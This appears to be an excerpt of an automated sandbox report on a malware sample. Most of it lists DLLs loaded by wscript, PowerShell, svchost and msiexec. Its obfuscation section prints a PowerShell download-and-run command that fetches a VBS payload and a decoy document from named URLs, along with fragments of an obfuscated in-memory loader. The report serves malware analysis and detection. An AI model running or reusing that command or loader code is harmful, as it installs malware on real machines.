                        Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: firewallapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: powrprof.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: umpdc.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                        Source: pqg5u7vt.LNK.13.drLNK file: ..\..\..\..\..\..\Public\pqg5u7vt.doc
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office
                        Source: Binary string: ystem.Core.pdb source: powershell.exe, 0000000B.00000002.2200996069.00000000076EC000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wkernel32.pdb source: msiexec.exe, 00000013.00000003.2323829000.0000000022F00000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.2323638881.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 0000000B.00000002.2200996069.00000000076EC000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdb source: msiexec.exe, 00000013.00000003.2325408969.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.2326506772.0000000023000000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: ntdll.pdb source: msiexec.exe, 00000013.00000003.2321624804.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: stem.Core.pdbC source: powershell.exe, 0000000B.00000002.2200996069.00000000076EC000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 00000013.00000003.2322952363.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.2323279955.0000000022F80000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: ntdll.pdbUGP source: msiexec.exe, 00000013.00000003.2321624804.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdb source: msiexec.exe, 00000013.00000003.2322952363.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.2323279955.0000000022F80000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 0000000B.00000002.2200996069.00000000076EC000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wkernel32.pdbUGP source: msiexec.exe, 00000013.00000003.2323829000.0000000022F00000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.2323638881.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdbUGP source: msiexec.exe, 00000013.00000003.2325408969.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.2326506772.0000000023000000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 0000000B.00000002.2154114579.0000000002F00000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000B.00000002.2200996069.00000000076EC000.00000004.00000020.00020000.00000000.sdmp

                        Data Obfuscation

                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell").Run "powershell.exe -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc'", 0IWshShell3.Run("powershell.exe -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url", "0")
                        Source: Yara matchFile source: 0000000B.00000002.2214810117.000000000B9FD000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.2214210925.0000000008970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.2187855204.0000000005C3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1989249528.000001D2A3A26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Hylernes)$glOBAl:CUarterOn = [SySTeM.TEXT.encOding]::ascii.GEtString($TEInt)$GLoBaL:UNDeVeLOpaBLe=$CUaRTEROn.suBstring($AFfIXaL,$UNaTTRibutiVE)<#Airbags Lamebrains Nilens Satyriskes
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Unibracteolate $Nonfamilies $Kartoffelkuren249), (vurderingsformen @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Omstningerne = [AppDomain]::CurrentDomai
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Krekortets26)), $Renskrivningersarderedes).DefineDynamicModule($Indefaceable, $false).DefineType($Gbakkes43, $Shamponerendes88, [Syste
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Hylernes)$glOBAl:CUarterOn = [SySTeM.TEXT.encOding]::ascii.GEtString($TEInt)$GLoBaL:UNDeVeLOpaBLe=$CUaRTEROn.suBstring($AFfIXaL,$UNaTTRibutiVE)<#Airbags Lamebrains Nilens Satyriskes
